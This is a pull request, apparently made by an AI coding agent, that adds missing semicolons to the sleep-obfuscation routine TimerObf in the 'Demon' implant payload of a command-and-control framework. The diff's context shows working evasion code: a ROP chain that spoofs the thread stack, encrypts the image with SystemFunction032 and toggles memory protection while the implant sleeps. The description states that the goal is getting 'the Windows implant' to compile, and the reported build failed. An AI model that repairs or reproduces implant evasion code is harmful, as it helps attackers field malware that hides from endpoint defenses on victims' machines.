### PR TITLE
Fix missing semicolons in TimerObf ROP chain

### DIFF
--- a/payloads/Demon/src/core/Obf.c
+++ b/payloads/Demon/src/core/Obf.c
@@ -504,31 +504,31 @@ BOOL TimerObf(
 
                     /* perform stack spoofing */
                     if ( Instance->Config.Implant.StackSpoof ) {
-                        OBF_JMP( Inc, Instance->Win32.NtGetContextThread )
+                        OBF_JMP( Inc, Instance->Win32.NtGetContextThread );
                         Rop[ Inc ].Rcx = U_PTR( ThdSrc  );
                         Rop[ Inc ].Rdx = U_PTR( &ThdCtx );
                         Inc++;
 
-                        OBF_JMP( Inc, Instance->Win32.RtlCopyMappedMemory )
+                        OBF_JMP( Inc, Instance->Win32.RtlCopyMappedMemory );
                         Rop[ Inc ].Rcx = U_PTR( &TimerCtx.Rip );
                         Rop[ Inc ].Rdx = U_PTR( &ThdCtx.Rip );
                         Rop[ Inc ].R8  = U_PTR( sizeof( VOID ) );
                         Inc++;
 
-                        OBF_JMP( Inc, Instance->Win32.RtlCopyMappedMemory )
+                        OBF_JMP( Inc, Instance->Win32.RtlCopyMappedMemory );
                         Rop[ Inc ].Rcx = U_PTR( &Instance->Teb->NtTib );
                         Rop[ Inc ].Rdx = U_PTR( &NtTib );
                         Rop[ Inc ].R8  = U_PTR( sizeof( NT_TIB ) );
                         Inc++;
 
-                        OBF_JMP( Inc, Instance->Win32.NtSetContextThread )
+                        OBF_JMP( Inc, Instance->Win32.NtSetContextThread );
                         Rop[ Inc ].Rcx = U_PTR( ThdSrc    );
                         Rop[ Inc ].Rdx = U_PTR( &TimerCtx );
                         Inc++;
                     }
 
                     /* Sleep */
-                    OBF_JMP( Inc, Instance->Win32.WaitForSingleObjectEx )
+                    OBF_JMP( Inc, Instance->Win32.WaitForSingleObjectEx );
                     Rop[ Inc ].Rcx = U_PTR( NtCurrentProcess() );
                     Rop[ Inc ].Rdx = U_PTR( Delay + TimeOut );
                     Rop[ Inc ].R8  = U_PTR( FALSE );
@@ -536,26 +536,26 @@ BOOL TimerObf(
 
                     /* undo stack spoofing */
                     if ( Instance->Config.Implant.StackSpoof ) {
-                        OBF_JMP( Inc, Instance->Win32.RtlCopyMappedMemory )
+                        OBF_JMP( Inc, Instance->Win32.RtlCopyMappedMemory );
                         Rop[ Inc ].Rcx = U_PTR( &Instance->Teb->NtTib );
                         Rop[ Inc ].Rdx = U_PTR( &BkpTib );
                         Rop[ Inc ].R8  = U_PTR( sizeof( NT_TIB ) );
                         Inc++;
 
-                        OBF_JMP( Inc, Instance->Win32.NtSetContextThread )
+                        OBF_JMP( Inc, Instance->Win32.NtSetContextThread );
                         Rop[ Inc ].Rcx = U_PTR( ThdSrc  );
                         Rop[ Inc ].Rdx = U_PTR( &ThdCtx );
                         Inc++;
                     }
 
                     /* Sys032 */
-                    OBF_JMP( Inc, Instance->Win32.SystemFunction032 )
+                    OBF_JMP( Inc, Instance->Win32.SystemFunction032 );
                     Rop[ Inc ].Rcx = U_PTR( &Img );
                     Rop[ Inc ].Rdx = U_PTR( &Key );
                     Inc++;
 
                     /* Protect */
-                    OBF_JMP( Inc, Instance->Win32.VirtualProtect )
+                    OBF_JMP( Inc, Instance->Win32.VirtualProtect );
                     Rop[ Inc ].Rcx = U_PTR( TxtBase );
                     Rop[ Inc ].Rdx = U_PTR( TxtSize );
                     Rop[ Inc ].R8  = U_PTR( Protect );
@@ -564,7 +564,7 @@ BOOL TimerObf(
 
                     /* End of Ropchain */
                     Rop[ Inc ].Rip = U_PTR( Instance->Win32.NtSetEvent );
-                    OBF_JMP( Inc, Instance->Win32.NtSetEvent )
+                    OBF_JMP( Inc, Instance->Win32.NtSetEvent );
                     Rop[ Inc ].Rcx = U_PTR( EvntDelay );
                     Rop[ Inc ].Rdx = U_PTR( NULL );
                     Inc++;


### PR DESCRIPTION
## Summary
- add missing semicolons after `OBF_JMP` macro invocations in TimerObf so the Windows implant can compile

## Testing
- `cmake --build .` *(fails: x86_64-w64-mingw32-gcc: not found)*

------
https://chatgpt.com/codex/tasks/task_e_68a5b1e2b5288322a1b3e580d560c564